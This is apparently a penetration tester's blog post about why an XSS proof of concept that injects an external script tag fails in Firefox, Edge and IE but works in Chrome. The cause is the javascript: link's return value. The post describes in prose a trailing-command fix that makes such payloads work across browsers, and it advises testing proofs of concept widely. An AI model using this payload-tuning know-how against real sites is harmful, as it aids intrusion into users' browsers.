Fri 14th June 19
I was recently contacted by Ryan Dewhurst
to help him with an XSS issue he was having problems with. Ryan knows his stuff, and if he was having problems with something, I knew it had to be a fun challenge.
XSS could easily be proved by injecting an alert which triggered when the link was clicked:
But when he tried to inject the following, fairly standard code, to add a new script tag to the DOM, he came across some issues.
The code worked fine on his test site (you all test your exploits locally before dropping them on a client site right?), the external JS file was loaded and the code ran successfully, but when it was dropped into the client environment, rather than the external file being loaded, the page refreshed and showed the following content:
I didn’t have access to the client site but was able to confirm that the sample code worked correctly for me and we both sat and scratched our heads. I was in the middle of writing a report so the test I’d done was in Chrome which I use as my main browser, to help with debugging, I brought up my testing environment of Firefox, Burp and a few other bits and then tried again with the test code. At this point the test code failed and I got the same response as Ryan was getting from the client site. I asked Ryan what browser he was using, he said Firefox to access the client but, same as me, had looked at the sample code in Chrome. When he tried running the exploit against the client site in Chrome, it worked as expected, the JS was loaded and ran fine.
After a bit of debugging, we found that by adding an alert or a console.log on to the end of the exploit code, it could be made to work in both Firefox and Chrome:
as a way to kill it. Swapping that in for the log command in this example worked and had the additional benefit of not writing anything extra to the console.
Based on the brief reading I did on the topic, the browser reaction should be based on what is returned by the last command ran.
which tells the browser not to react to the link,
returns the element which was added to the DOM, which is not
Out of curiosity, I also tried the test code in Edge and IE. I initially got some mixed results with both showing signs of working with and without the trailing command but after clearing caches and starting from a clean slate, both appear to work in the same way as Firefox and require the trailing command.
If you want to check this out, I’ve setup two demonstrations on JSFiddle:
Before anyone jumps in shouting "I’d have exploited it a different way", or, "This way is better…", when this failed, both Ryan and myself wanted to know why. Yes, there are lots of other ways this could have been exploited, but learning why something is failing is a really useful task and practising debugging things like this when they come up helps improve those core skills.
As well as pointing out this specific quirk, I want this post to highlight the different behaviours between browsers, all of which are supposed to implement the same standard. If you are developing a proof of concept, make sure you test it out in as many different environments as possible and comment on the findings in your report. You don’t want to spend ages putting together an amazing demo of an exploit only to find that while it worked perfectly for you in Chrome, it didn’t work for the client when they looked at it in Edge.
Similarly, you might feel that a vulnerability deserves its risk level changing if browser support is not universal; a vulnerability which can only be exploited in Firefox may not be a serious risk to a client who has enforced rules on staff only using IE.
Finally, if something doesn’t work for you the first time, or doesn’t work quite as you would expect, if you have the time, look into why. Spend some time debugging it and trying to understand the problem as those few minutes spent today may save you hours on a future test.